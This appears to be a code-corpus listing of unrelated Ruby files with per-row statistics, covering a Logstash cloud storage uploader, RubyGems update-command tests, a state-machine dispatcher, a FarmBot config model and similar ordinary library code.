node.if_type? && node.ternary?
end
def logical_operator?(node)
(node.and_type? || node.or_type?) && node.logical_operator?
end
def hash_literal?(node)
node.hash_type? && node.braces?
end
end
end
end
end
| 28.117647 | 78 | 0.565783 |
4aadc4bab6175b2fb8c7bedcd8cc7245f66a9176 | 531 | # a simple (manual) unsaved? flag and method. at least it automatically reverts after a save!
module ActiveScaffold::UnsavedRecord
# acts like a dirty? flag, manually thrown during update_record_from_params.
def unsaved=(val)
@unsaved = (val) ? true : false
end
# whether the unsaved? flag has been thrown
def unsaved?
@unsaved
end
# automatically unsets the unsaved flag
def save(*)
super.tap { self.unsaved = false }
end
end
ActiveRecord::Base.class_eval { include ActiveScaffold::UnsavedRecord }
| 27.947368 | 93 | 0.728814 |
03ae1b8a3d0c072554ef46dc75d0236a3dafe00b | 3,503 | # encoding: utf-8
require "logstash/util"
require 'thread'
require 'java'
require 'logstash-output-google_cloud_storage_jars.rb'
java_import 'com.google.api.gax.rpc.FixedHeaderProvider'
java_import 'com.google.api.gax.retrying.RetrySettings'
java_import 'com.google.auth.oauth2.GoogleCredentials'
java_import 'com.google.cloud.storage.BlobInfo'
java_import 'com.google.cloud.storage.StorageOptions'
java_import 'java.io.FileInputStream'
java_import 'org.threeten.bp.Duration'
module LogStash
module Outputs
class GCS
class Uploader
DEFAULT_THREADPOOL = Concurrent::ThreadPoolExecutor.new({
:min_threads => 1,
:max_threads => 8,
:max_queue => 1,
:fallback_policy => :caller_runs
})
attr_reader :bucket, :upload_options, :logger
def initialize(bucket, logger, threadpool = DEFAULT_THREADPOOL, retry_count: Float::INFINITY, retry_delay: 1)
@bucket = bucket
@workers_pool = threadpool
@logger = logger
@retry_count = retry_count
@retry_delay = retry_delay
end
def upload_async(file, options = {})
@workers_pool.post do
LogStash::Util.set_thread_name("GCS output uploader, file: #{file.path}")
upload(file, options)
end
end
def upload(file, options = {})
upload_options = options.fetch(:upload_options, {})
tries = 0
begin
obj = bucket.object(file.key)
obj.upload_file(file.path, upload_options)
rescue Errno::ENOENT => e
logger.error("File doesn't exist! Unrecoverable error.", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
rescue => e
# When we get here it usually mean that S3 tried to do some retry by himself (default is 3)
# When the retry limit is reached or another error happen we will wait and retry.
#
# Thread might be stuck here, but I think its better than losing anything
# its either a transient errors or something bad really happened.
if tries < @retry_count
tries += 1
logger.warn("Uploading failed, retrying (##{tries} of #{@retry_count})", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
sleep @retry_delay
retry
else
logger.error("Failed to upload file (retried #{@retry_count} times).", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
end
end
begin
options[:on_complete].call(file) unless options[:on_complete].nil?
rescue => e
logger.error("An error occurred in the `on_complete` uploader", :exception => e.class, :message => e.message, :path => file.path, :backtrace => e.backtrace)
raise e # reraise it since we don't deal with it now
end
end
def stop
@workers_pool.shutdown
@workers_pool.wait_for_termination(nil) # block until its done
end
end
end
end
end
| 39.806818 | 179 | 0.568655 |
6a327068e25e8711457d053b44316b3f04de2adc | 11,922 | require 'rubygems/test_case'
require 'rubygems/commands/update_command'
begin
gem "rdoc"
rescue Gem::LoadError
# ignore
end
class TestGemCommandsUpdateCommand < Gem::TestCase
def setup
super
common_installer_setup
@cmd = Gem::Commands::UpdateCommand.new
@cmd.options[:document] = []
@specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
fetcher.gem 'a', '3.a'
fetcher.clear
end
@a1_path = @specs['a-1'].cache_file
@a2_path = @specs['a-1'].cache_file
@a3a_path = @specs['a-3.a'].cache_file
end
def test_execute
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_multiple
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.gem 'ab', 2
fetcher.clear
fetcher.spec 'a', 1
fetcher.spec 'ab', 1
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_system
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_at_latest
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', Gem::VERSION do |s|
s.files = %w[setup.rb]
end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
assert_raises Gem::MockGemUi::SystemExitException do
use_ui @ui do
@cmd.execute
end
end
out = @ui.output.split "\n"
assert_equal "Latest version currently installed. Aborting.", out.shift
assert_empty out
end
def test_execute_system_multiple
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_specific
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = "8"
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 8", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_specifically_to_latest_version
spec_fetcher do |fetcher|
fetcher.gem 'rubygems-update', 8 do |s| s.files = %w[setup.rb] end
fetcher.gem 'rubygems-update', 9 do |s| s.files = %w[setup.rb] end
fetcher.clear
end
@cmd.options[:args] = []
@cmd.options[:system] = "9"
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating rubygems-update", out.shift
assert_equal "Installing RubyGems 9", out.shift
assert_equal "RubyGems system software updated", out.shift
assert_empty out
end
def test_execute_system_with_gems
@cmd.options[:args] = %w[gem]
@cmd.options[:system] = true
assert_raises Gem::MockGemUi::TermError do
use_ui @ui do
@cmd.execute
end
end
assert_empty @ui.output
assert_equal "ERROR: Gem names are not allowed with the --system option\n",
@ui.error
end
# before:
# a1 -> c1.2
# after:
# a2 -> b2 # new dependency
# a2 -> c2
def test_execute_dependencies
spec_fetcher do |fetcher|
fetcher.gem 'a', 2, 'b' => 2, 'c' => 2
fetcher.gem 'b', 2
fetcher.gem 'c', 2
fetcher.clear
fetcher.spec 'a', 1, 'c' => '1.2'
fetcher.spec 'c', '1.2'
end
Gem::Specification.reset
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a b c",
out.shift
assert_empty out
end
def test_execute_rdoc
skip if RUBY_VERSION <= "1.8.7"
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
Gem.done_installing(&Gem::RDoc.method(:generation_hook))
@cmd.options[:document] = %w[rdoc ri]
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
wait_for_child_process_to_exit
a2 = @specs['a-2']
assert_path_exists File.join(a2.doc_dir, 'rdoc')
end
def test_execute_named
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_named_some_up_to_date
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
fetcher.spec 'b', 2
end
@cmd.options[:args] = %w[a b]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_equal "Gems already up-to-date: b", out.shift
assert_empty out
end
def test_execute_named_up_to_date
spec_fetcher do |fetcher|
fetcher.spec 'a', 2
end
@cmd.options[:args] = %w[a]
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Nothing to update", out.shift
assert_empty out
end
def test_execute_named_up_to_date_prerelease
spec_fetcher do |fetcher|
fetcher.gem 'a', '3.a'
fetcher.clear
fetcher.gem 'a', 2
end
@cmd.options[:args] = %w[a]
@cmd.options[:prerelease] = true
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Updating a", out.shift
assert_equal "Gems updated: a", out.shift
assert_empty out
end
def test_execute_up_to_date
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
end
@cmd.options[:args] = []
use_ui @ui do
@cmd.execute
end
out = @ui.output.split "\n"
assert_equal "Updating installed gems", out.shift
assert_equal "Nothing to update", out.shift
assert_empty out
end
def test_execute_user_install
spec_fetcher do |fetcher|
fetcher.gem 'a', 2
fetcher.clear
fetcher.spec 'a', 1
end
@cmd.handle_options %w[--user-install]
use_ui @ui do
@cmd.execute
end
installer = @cmd.installer
user_install = installer.instance_variable_get :@user_install
assert user_install, 'user_install must be set on the installer'
end
def test_fetch_remote_gems
specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
end
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_fetch_remote_gems_error
Gem.sources.replace %w[http://nonexistent.example]
assert_raises Gem::RemoteFetcher::FetchError do
@cmd.fetch_remote_gems @specs['a-1']
end
end
def test_fetch_remote_gems_mismatch
platform = Gem::Platform.new 'x86-freebsd9'
specs = spec_fetcher do |fetcher|
fetcher.spec 'a', 1
fetcher.spec 'a', 2
fetcher.spec 'a', 2 do |s| s.platform = platform end
end
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_fetch_remote_gems_prerelease
specs = spec_fetcher do |fetcher|
fetcher.gem 'a', 1
fetcher.gem 'a', 2
fetcher.gem 'a', '3.a'
end
@cmd.options[:prerelease] = true
expected = [
[Gem::NameTuple.new('a', v(2), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
[Gem::NameTuple.new('a', v('3.a'), Gem::Platform::RUBY),
Gem::Source.new(@gem_repo)],
]
assert_equal expected, @cmd.fetch_remote_gems(specs['a-1'])
end
def test_handle_options_system
@cmd.handle_options %w[--system]
expected = {
:args => [],
:document => %w[rdoc ri],
:force => false,
:system => true,
}
assert_equal expected, @cmd.options
end
def test_handle_options_system_non_version
assert_raises ArgumentError do
@cmd.handle_options %w[--system non-version]
end
end
def test_handle_options_system_specific
@cmd.handle_options %w[--system 1.3.7]
expected = {
:args => [],
:document => %w[rdoc ri],
:force => false,
:system => "1.3.7",
}
assert_equal expected, @cmd.options
end
def test_update_gem_prerelease
spec_fetcher do |fetcher|
fetcher.spec 'a', '1.a'
fetcher.gem 'a', '1.b'
end
@cmd.update_gem 'a', Gem::Requirement.new('= 1.b')
refute_empty @cmd.updated
assert @cmd.installer.instance_variable_get :@prerelease
end
def test_update_gem_unresolved_dependency
spec_fetcher do |fetcher|
fetcher.spec 'a', 1
fetcher.gem 'a', 2 do |s|
s.add_dependency 'b', '>= 2'
end
fetcher.spec 'b', 1
end
@cmd.update_gem 'a'
assert_empty @cmd.updated
end
def test_update_rubygems_arguments
@cmd.options[:system] = true
arguments = @cmd.update_rubygems_arguments
assert_equal '--prefix', arguments.shift
assert_equal Gem.prefix, arguments.shift
assert_equal '--no-rdoc', arguments.shift
assert_equal '--no-ri', arguments.shift
assert_equal '--previous-version', arguments.shift
assert_equal Gem::VERSION, arguments.shift
assert_empty arguments
end
def test_update_rubygems_arguments_1_8_x
@cmd.options[:system] = '1.8.26'
arguments = @cmd.update_rubygems_arguments
assert_equal '--prefix', arguments.shift
assert_equal Gem.prefix, arguments.shift
assert_equal '--no-rdoc', arguments.shift
assert_equal '--no-ri', arguments.shift
assert_empty arguments
end
end
| 21.915441 | 80 | 0.620282 |
390ce96fa2dfe84ddda94dba5da7245ec8fc244f | 983 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
module ArrowDataset
VERSION = "5.0.0-SNAPSHOT"
module Version
numbers, TAG = VERSION.split("-")
MAJOR, MINOR, MICRO = numbers.split(".").collect(&:to_i)
STRING = VERSION
end
end
| 36.407407 | 62 | 0.747711 |
bb49383a704ae16a81d0be8faa78e0251f62073a | 956 | module Metamachine
# Handler of events
# Builds transition and contract
# Runs transition runner in the context of contract
class Dispatch
include DefInitialize.with('machine, event_name, target, params')
def call
build_transition.tap do |transition|
transition.contract!(transition.target) do
machine.run_transition(transition)
end
end
end
private
def build_transition
Transition.new(
event_name: event_name,
target: target,
params: params,
contract: build_contract
)
end
def build_contract
state_from = target.send(machine.state_reader)
state_to = machine.calculate_state_to(state_from, event_name)
raise InvalidTransitionInitialState if state_to.nil?
StateContract.new(
state_from: state_from,
state_to: state_to,
state_reader: machine.state_reader
)
end
end
end
| 23.317073 | 69 | 0.666318 |
181c79fd0a6a8b34578155af360d9785bc73b938 | 236 | require "music-theory/note/name"
require "music-theory/note/value"
module MusicTheory
module Note
class << self
def new(*args)
Note::Name.find(*args)
end
alias_method :find, :new
end
end
end
| 11.8 | 33 | 0.618644 |
4a453d12a9844d683ac8279727b637643c3f2bc9 | 1,093 | # An API backup of user options for Farmbot OS.
class FbosConfig < ApplicationRecord
class MissingSerial < StandardError; end
belongs_to :device
after_save :maybe_sync_nerves, on: [:create, :update]
FIRMWARE_HARDWARE = [
ARDUINO = "arduino",
FARMDUINO = "farmduino",
FARMDUINO_K14 = "farmduino_k14",
EXPRESS_K10 = "express_k10",
]
NERVES_FIELD = "update_channel"
def push_changes_to_nerves_hub(serial_number, channel)
NervesHub.update_channel(serial_number, channel)
end
def sync_nerves
serial = device.serial_number
unless serial
# This feature can be removed in May '19
# It is used to repair data damage on
# production during the initial nerveshub
# deployment.
problem = "Device #{device.id} missing serial"
NervesHub.report_problem({ problem: problem })
return
end
self.delay.push_changes_to_nerves_hub(serial, update_channel)
end
def nerves_info_changed?
the_changes.keys.include?(NERVES_FIELD)
end
def maybe_sync_nerves
sync_nerves if nerves_info_changed?
end
end
| 25.418605 | 65 | 0.719122 |
e268f920ed38fac79c9a624f77b2273ce6e11557 | 4,997 | require_relative 'differ_test_base'
class DiffSummaryTest < DifferTestBase
def self.id58_prefix
'4DE'
end
# - - - - - - - - - - - - - - - - - - - - - - - -
test 'j12',
'created empty file' do
assert_diff_summary('RNCzUr', 2, 3,
:created, nil, 'empty.file', 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j13',
'deleted empty file' do
assert_diff_summary('RNCzUr', 3, 4,
:deleted, 'empty.file', nil, 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j14',
'renamed empty file' do
assert_diff_summary('RNCzUr', 5, 6,
:renamed, 'empty.file', 'empty.file.rename', 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j15',
'empty file renamed 100% identical across dirs' do
assert_diff_summary('RNCzUr', 6, 7,
:renamed, "empty.file.rename", "sub_dir/empty.file.rename", 0,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
# - - - - - - - - - - - - - -
test 'j16',
'empty file has one lines added' do
assert_diff_summary('RNCzUr', 7, 8,
:changed, "sub_dir/empty.file.rename", "sub_dir/empty.file.rename", 1,0,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'readme.txt' , 'readme.txt' , 0,0,14
)
end
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
test 'k15',
'non-empty file deleted' do
assert_diff_summary('RNCzUr', 8, 9,
:deleted, "readme.txt", nil, 0,14,0,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k16',
'non-empty file renamed 100% identical' do
assert_diff_summary('RNCzUr', 9, 10,
:renamed, "bats_help.txt", "bats_help.txt.rename", 0,0,3,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k17',
'non-empty file renamed <100% identical' do
assert_diff_summary('RNCzUr', 13, 14,
:changed, "bats_help.txt", "bats_help.txt", 1,1,19, # data error. No rename here.
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'hiker.sh' , 'hiker.sh' , 0,0,6,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
:unchanged, 'sub_dir/empty.file.rename', 'sub_dir/empty.file.rename', 0,0,1
)
end
# - - - - - - - - - - - - - -
test 'k18',
'two non-empty files both edited' do
assert_diff_summary('RNCzUr', 1, 2,
:changed, "hiker.sh", "hiker.sh", 1,1,5,
:changed, "readme.txt", "readme.txt", 6,3,8,
:unchanged, 'test_hiker.sh', 'test_hiker.sh', 0,0,8,
:unchanged, 'bats_help.txt', 'bats_help.txt', 0,0,3,
:unchanged, 'cyber-dojo.sh', 'cyber-dojo.sh', 0,0,2,
)
end
private
def assert_diff_summary(id, was_index, now_index, *diffs)
expected = diffs.each_slice(6).to_a.map do |diff|
{ type: diff[0],
old_filename: diff[1],
new_filename: diff[2],
line_counts: { added:diff[3], deleted:diff[4], same:diff[5] }
}
end
actual = diff_summary(id, was_index, now_index)
assert_equal expected, actual
end
def diff_summary(id, was_index, now_index)
differ.diff_summary(id:id, was_index:was_index, now_index:now_index)
end
end
| 33.092715 | 87 | 0.554333 |
01891696fb77a6cf8c03319ed7a65cc69e7e6a02 | 491 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = '1.0'
# Add additional assets to the asset load path
# Rails.application.config.assets.paths << Emoji.images_path
# Precompile additional assets.
# application.js, application.css.sass, and all non-JS/CSS in app/assets folder are already added.
# Rails.application.config.assets.precompile += %w( search.js )
| 40.916667 | 98 | 0.769857 |
5de6d226cb16193212fe41dcfdd68bdd7abe7116 | 131 | class AddReviewsCountToItems < ActiveRecord::Migration[5.2]
def change
add_column :items, :reviews_count, :integer
end
end
| 21.833333 | 59 | 0.763359 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.